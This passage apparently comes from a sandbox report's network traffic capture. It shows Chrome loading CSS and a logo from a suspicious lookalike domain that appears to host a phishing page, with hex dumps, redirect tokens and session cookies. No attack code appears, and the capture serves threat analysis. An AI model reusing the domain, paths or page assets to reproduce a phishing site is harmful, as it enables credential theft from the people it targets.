                                                                          Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                          2024-10-01 22:43:15 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                          Data Ascii: 1
                                                                          2024-10-01 22:43:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.2.649797104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1273OUTGET /css_/DmiM9Aw3DnV3DPQ HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/css,*/*;q=0.1
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: style
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC626INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: text/css
                                                                          Content-Length: 105417
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Accept-Ranges: bytes
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWiHy0K4ejOQQkK4hKHyUGX5jmXbWqd1%2F1RKRi%2FUyg31Jew%2FNPOW6x0%2BMvahVfgttRTYqXQXO5AD3uPf8K8LQamrQia4yFK2jvhVCWDmlK8xmeYEkTVSUCEUTTM6gxBkfvUNnDLgrjPiR%2F3RX0H%2B6zjtn9AZPcw%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c6a5a43e3-EWR
                                                                          2024-10-01 22:43:17 UTC743INData Raw: 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6d 61 69 6e 2c 6d 65 6e 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72
                                                                          Data Ascii: html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;ver
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c
                                                                          Data Ascii: rgin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visibl
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 7b 64 69 73 70 6c 61 79 3a 62
                                                                          Data Ascii: border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline-offset:-2px;outline:5px auto -webkit-focus-ring-color}figure{margin:0}img{vertical-align:middle}.img-responsive{display:b
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a
                                                                          Data Ascii: }.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}ul,ol{margin-top:0;margin-bottom:
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 36 70 78 3b 66 6f 6e 74 2d 77 65 69
                                                                          Data Ascii: 2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxlines-4{max-height:324.5432px;max-height:20.28395rem}.text-header,h1{font-size:46px;line-height:56px;font-wei
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 30 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78
                                                                          Data Ascii: :28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.text-max
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 38 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 36 34 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c
                                                                          Data Ascii: ext-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-caption-al
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 32 37 38 33 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 2e 34 35 34 70
                                                                          Data Ascii: m;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.text-body.text-maxlines-2,p.text-maxlines-2{max-height:40.454p
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 70 78 3b 77 69 64 74 68 3a 39 30 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 2c 2e 63 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 2c 2e 63 6f 6e 74 61 69 6e 65
                                                                          Data Ascii: se,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right:auto;margin-left:auto;padding-left:2px;padding-right:2px;width:90%}.container:before,.container:after,.containe
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63 6f 6c 2d 6c 67 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 2c 2e 63 6f 6c 2d 73 6d 2d 32 34 2c 2e 63 6f 6c 2d 6d 64 2d 32 34 2c 2e 63 6f 6c 2d 6c 67 2d 32 34 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68
                                                                          Data Ascii: md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-lg-23,.col-xs-24,.col-sm-24,.col-md-24,.col-lg-24{position:relative;min-height:1px;padding-left:2px;padding-righ


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.649796104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1320OUTGET /logo_/5HwVWMJJMP8EV8z HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC640INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yT1W6RGja%2BBwylPpv0BQpLyujc0PEjpfq2XNqDCC%2Fg92sKmwykg3czpimiXBol%2FFxv4ycfcMwKxxru2eSVC8ewtvyMhUO1RRuSgoXYLUc%2F70aw2fDIkrVRba6UlYtRRQ%2Fng%2FeFBOVg%2B%2FO3ihYl9QACxm27QQgKY%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c6e594332-EWR
                                                                          2024-10-01 22:43:17 UTC729INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                                          Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e
                                                                          Data Ascii: 431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c
                                                                          Data Ascii: 539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,
                                                                          2024-10-01 22:43:17 UTC191INData Raw: 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                          Data Ascii: th="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                                          2024-10-01 22:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.649799104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1348OUTGET /sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6 HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
